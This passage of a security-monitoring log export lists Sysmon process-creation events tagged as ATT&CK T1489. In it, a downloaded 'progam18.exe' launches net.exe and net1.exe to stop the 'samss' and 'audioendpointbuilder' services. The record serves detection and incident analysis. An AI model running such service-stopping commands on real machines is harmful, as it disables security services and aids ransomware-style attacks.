Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d1f6-5ec7-0000-001000cb3900}"",""parentProcessId"":""182144"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:40:11.305",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:58.347 +ProcessGuid: {df9fc3d3-d1f6-5ec7-0000-001033d13900} +ProcessId: 182656 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:58.352185600Z"",""eventRecordID"":""1158"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:58.347\r\nProcessGuid: {df9fc3d3-d1f6-5ec7-0000-001033d13900}\r\nProcessId: 182656\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:58.347"",""processGuid"":""{df9fc3d3-d1f6-5ec7-0000-001033d13900}"",""processId"":""182656"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:40:11.122",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:58.102 +ProcessGuid: {df9fc3d3-d1f6-5ec7-0000-001000cb3900} +ProcessId: 182144 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:58.113564800Z"",""eventRecordID"":""1157"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:58.102\r\nProcessGuid: {df9fc3d3-d1f6-5ec7-0000-001000cb3900}\r\nProcessId: 182144\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:58.102"",""processGuid"":""{df9fc3d3-d1f6-5ec7-0000-001000cb3900}"",""processId"":""182144"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:39:34.622",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:26.551 +ProcessGuid: {df9fc3d3-d1d6-5ec7-0000-00101f383300} +ProcessId: 165548 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d1d6-5ec7-0000-0010cd1b3300} +ParentProcessId: 165472 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:26.553613400Z"",""eventRecordID"":""1153"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:26.551\r\nProcessGuid: {df9fc3d3-d1d6-5ec7-0000-00101f383300}\r\nProcessId: 165548\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d1d6-5ec7-0000-0010cd1b3300}\r\nParentProcessId: 165472\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:26.551"",""processGuid"":""{df9fc3d3-d1d6-5ec7-0000-00101f383300}"",""processId"":""165548"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d1d6-5ec7-0000-0010cd1b3300}"",""parentProcessId"":""165472"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:39:34.607",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:26.235 +ProcessGuid: {df9fc3d3-d1d6-5ec7-0000-00100a223300} +ProcessId: 165496 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d1d5-5ec7-0000-001012033300} +ParentProcessId: 165036 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:26.242662700Z"",""eventRecordID"":""1152"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:26.235\r\nProcessGuid: {df9fc3d3-d1d6-5ec7-0000-00100a223300}\r\nProcessId: 165496\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d1d5-5ec7-0000-001012033300}\r\nParentProcessId: 165036\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:26.235"",""processGuid"":""{df9fc3d3-d1d6-5ec7-0000-00100a223300}"",""processId"":""165496"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d1d5-5ec7-0000-001012033300}"",""parentProcessId"":""165036"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:39:34.591",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:26.163 +ProcessGuid: {df9fc3d3-d1d6-5ec7-0000-0010cd1b3300} +ProcessId: 165472 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:26.169939500Z"",""eventRecordID"":""1151"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:26.163\r\nProcessGuid: {df9fc3d3-d1d6-5ec7-0000-0010cd1b3300}\r\nProcessId: 165472\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:26.163"",""processGuid"":""{df9fc3d3-d1d6-5ec7-0000-0010cd1b3300}"",""processId"":""165472"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:39:34.562",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:25.849 +ProcessGuid: {df9fc3d3-d1d5-5ec7-0000-001012033300} +ProcessId: 165036 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:25.851290900Z"",""eventRecordID"":""1149"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:25.849\r\nProcessGuid: {df9fc3d3-d1d5-5ec7-0000-001012033300}\r\nProcessId: 165036\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:25.849"",""processGuid"":""{df9fc3d3-d1d5-5ec7-0000-001012033300}"",""processId"":""165036"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:39:23.542",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:15.051 +ProcessGuid: {df9fc3d3-d1cb-5ec7-0000-0010c4723100} +ProcessId: 153708 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d1ca-5ec7-0000-0010f1683100} +ParentProcessId: 153288 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:15.075732000Z"",""eventRecordID"":""1148"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:15.051\r\nProcessGuid: {df9fc3d3-d1cb-5ec7-0000-0010c4723100}\r\nProcessId: 153708\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating 